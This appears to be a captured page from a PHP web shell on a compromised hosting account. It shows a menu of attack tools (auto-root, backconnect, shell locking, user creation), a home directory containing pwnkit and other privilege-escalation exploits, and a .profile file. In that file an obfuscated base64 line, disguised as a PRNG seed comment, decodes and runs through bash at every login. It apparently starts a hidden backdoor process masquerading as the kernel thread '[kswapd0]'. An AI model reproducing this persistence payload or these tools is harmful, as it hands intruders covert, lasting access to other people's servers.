Linux vmi2114108.contaboserver.net 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 194.233.74.117 | : 216.73.216.221
92 Domain
8.2.30
diaspora
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
diaspora /
[ HOME SHELL ]
Name
Size
Permission
Action
.caldav
[ DIR ]
drwxr-xr-x
.config
[ DIR ]
drwx------
.cpanel
[ DIR ]
drwx------
.htpasswds
[ DIR ]
drwxr-x---
.koality
[ DIR ]
drwxr-xr-x
.pkexec
[ DIR ]
drwxr-xr-x
.razor
[ DIR ]
drwxr-xr-x
.spamassassin
[ DIR ]
drwx------
.subaccounts
[ DIR ]
drwx------
.trash
[ DIR ]
drwx------
.wp-cli
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
access-logs
[ DIR ]
drwxr-x---
etc
[ DIR ]
drwxr-x---
logs
[ DIR ]
drwx------
mail
[ DIR ]
drwxr-x--x
perl5
[ DIR ]
drwxr-xr-x
public_ftp
[ DIR ]
drwxr-x---
public_html
[ DIR ]
drwxr-xr-x
ssl
[ DIR ]
drwxr-xr-x
tmp
[ DIR ]
drwxr-xr-x
wordpress-backups
[ DIR ]
drwx------
www
[ DIR ]
drwxr-xr-x
.bash_logout
18
B
-rw-r--r--
.bash_profile
141
B
-rw-r--r--
.bashrc
793
B
-rw-r--r--
.imunify_patch_id
106
B
-rw-rw----
.lastlogin
521
B
-rw-------
.mad-root
0
B
-rw-r--r--
.myimunify_id
102
B
-rw-rw----
.profile
1.2
KB
-rw-r--r--
.wget-hsts
180
B
-rw-r--r--
.wp-toolkit-identifier
684
B
-rw-------
README.md
404
B
-rw-r--r--
copyfail.py
3.95
KB
-rw-r--r--
copyfail_gpasswd.py
3.96
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .profile
# ~/.profile: executed by the command interpreter for login shells. # DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA3IGRlZnVuY3QgMj4vZGV2L251bGwgfHwgKFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvZGlhc3BvcmEvLmNvbmZpZy9odG9wL2RlZnVuY3QuZGF0IC1saXFEIiBleGVjIC1hICdba3N3YXBkMF0nICcvaG9tZS9kaWFzcG9yYS8uY29uZmlnL2h0b3AvZGVmdW5jdCcgMj4vZGV2L251bGwpCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel # This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login # exists. # see /usr/share/doc/bash/examples/startup-files for examples. # the files are located in the bash-doc package. # the default umask is set in /etc/profile; for setting the umask # for ssh logins, install and configure the libpam-umask package. #umask 022 # if running bash if [ -n "$BASH_VERSION" ]; then # include .bashrc if it exists if [ -f "$HOME/.bashrc" ]; then . "$HOME/.bashrc" fi fi # set PATH so it includes user's private bin if it exists if [ -d "$HOME/bin" ] ; then PATH="$HOME/bin:$PATH" fi # set PATH so it includes user's private bin if it exists if [ -d "$HOME/.local/bin" ] ; then PATH="$HOME/.local/bin:$PATH" fi
Close